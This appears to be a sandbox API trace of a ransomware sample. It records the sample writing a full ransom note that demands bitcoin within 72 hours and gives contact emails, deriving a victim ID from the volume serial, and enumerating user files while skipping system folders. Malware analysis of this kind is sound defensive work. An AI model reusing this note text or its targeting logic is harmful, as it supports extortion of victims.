	[0200.155] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0200.155] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\HELP_DECRYPT_YOUR_FILES.HTML") returned 110
	[0200.156] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0200.159] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0200.159] WriteFile (in: hFile=0x388, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0200.162] CloseHandle (hObject=0x388) returned 1
	[0200.162] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0200.162] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0200.163] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0200.163] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0200.164] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.164] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0200.164] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0200.165] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.165] WriteFile (in: hFile=0x388, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0200.165] CloseHandle (hObject=0x388) returned 1
	[0200.165] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x969c9090, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0xf1289650, ftLastAccessTime.dwHighDateTime=0x1d97158, ftLastWriteTime.dwLowDateTime=0x90d41565, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0200.166] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*") returned 85
	[0200.166] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.166] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\*.*", cchLength=0x55 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*") returned 0x55
	[0200.166] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.166] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="windows") returned 0x0
	[0200.167] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.167] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="boot") returned 0x0
	[0200.167] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.167] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="system volume information") returned 0x0
	[0200.167] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.167] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.168] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.168] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="temp") returned 0x0
	[0200.168] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.168] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="program files") returned 0x0
	[0200.168] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.168] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="program files (x86)") returned 0x0
	[0200.168] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.169] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="appdata") returned 0x0
	[0200.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.169] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="application data") returned 0x0
	[0200.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.169] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="winnt") returned 0x0
	[0200.169] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.170] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="tmp") returned 0x0
	[0200.170] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.170] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="cache") returned 0x0
	[0200.170] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.170] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="temporary internet files") returned 0x0
	[0200.170] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.171] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="webcache") returned 0x0
	[0200.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.171] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="inetcache") returned 0x0
	[0200.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.171] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="nvidia") returned 0x0
	[0200.171] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.172] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="packages") returned 0x0
	[0200.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.172] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="cookies") returned 0x0
	[0200.172] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.172] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\*.*", lpSrch="programdata") returned 0x0
	[0200.172] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0200.173] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0200.173] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x969c9090, ftCreationTime.dwHighDateTime=0x1d96ba1, ftLastAccessTime.dwLowDateTime=0xf1289650, ftLastAccessTime.dwHighDateTime=0x1d97158, ftLastWriteTime.dwLowDateTime=0x90d41565, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0200.173] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0200.173] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d41565, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90d41565, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90d67e1c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0200.301] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d41565, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90d41565, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90d41565, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0200.301] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f8ce420, ftCreationTime.dwHighDateTime=0x1d968a6, ftLastAccessTime.dwLowDateTime=0x9821c9c0, ftLastAccessTime.dwHighDateTime=0x1d96a1c, ftLastWriteTime.dwLowDateTime=0x9821c9c0, ftLastWriteTime.dwHighDateTime=0x1d96a1c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JnTt-vV vFZHDMuv", cAlternateFileName="JNTT-V~1")) returned 1
	[0200.301] lstrcmpW (lpString1="JnTt-vV vFZHDMuv", lpString2="..") returned 1
	[0200.301] lstrcmpW (lpString1="JnTt-vV vFZHDMuv", lpString2=".") returned 1
	[0200.301] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE"
	[0200.301] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\"
	[0200.301] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\", lpString2="JnTt-vV vFZHDMuv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv"
	[0200.302] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv"
	[0200.302] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\"
	[0200.302] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\"
	[0200.302] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*"
	[0200.302] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f8ce420, ftCreationTime.dwHighDateTime=0x1d968a6, ftLastAccessTime.dwLowDateTime=0x9821c9c0, ftLastAccessTime.dwHighDateTime=0x1d96a1c, ftLastWriteTime.dwLowDateTime=0x9821c9c0, ftLastWriteTime.dwHighDateTime=0x1d96a1c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb8eb0
	[0200.302] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*") returned 102
	[0200.303] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.303] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*", cchLength=0x66 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*") returned 0x66
	[0200.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.303] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="windows") returned 0x0
	[0200.303] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.303] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="boot") returned 0x0
	[0200.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.304] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="system volume information") returned 0x0
	[0200.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.304] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.304] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.305] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="temp") returned 0x0
	[0200.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.305] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="program files") returned 0x0
	[0200.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.305] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="program files (x86)") returned 0x0
	[0200.305] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.305] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="appdata") returned 0x0
	[0200.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.306] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="application data") returned 0x0
	[0200.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.306] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="winnt") returned 0x0
	[0200.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.306] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="tmp") returned 0x0
	[0200.306] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.307] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="cache") returned 0x0
	[0200.307] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.307] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="temporary internet files") returned 0x0
	[0200.307] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.307] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="webcache") returned 0x0
	[0200.307] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.308] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="inetcache") returned 0x0
	[0200.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.308] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="nvidia") returned 0x0
	[0200.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.308] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="packages") returned 0x0
	[0200.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.309] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="cookies") returned 0x0
	[0200.309] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.309] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="programdata") returned 0x0
	[0200.309] FindNextFileW (in: hFindFile=0xfb8eb0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f8ce420, ftCreationTime.dwHighDateTime=0x1d968a6, ftLastAccessTime.dwLowDateTime=0x9821c9c0, ftLastAccessTime.dwHighDateTime=0x1d96a1c, ftLastWriteTime.dwLowDateTime=0x9821c9c0, ftLastWriteTime.dwHighDateTime=0x1d96a1c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0200.309] FindNextFileW (in: hFindFile=0xfb8eb0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdcb14a0, ftCreationTime.dwHighDateTime=0x1d96a46, ftLastAccessTime.dwLowDateTime=0x88f0c830, ftLastAccessTime.dwHighDateTime=0x1d96f48, ftLastWriteTime.dwLowDateTime=0x88f0c830, ftLastWriteTime.dwHighDateTime=0x1d96f48, nFileSizeHigh=0x0, nFileSizeLow=0x133e4, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="651iJdW0jxRz3jH.flv", cAlternateFileName="651IJD~1.FLV")) returned 1
	[0200.309] lstrcmpW (lpString1="651iJdW0jxRz3jH.flv", lpString2="..") returned 1
	[0200.309] lstrcmpW (lpString1="651iJdW0jxRz3jH.flv", lpString2=".") returned 1
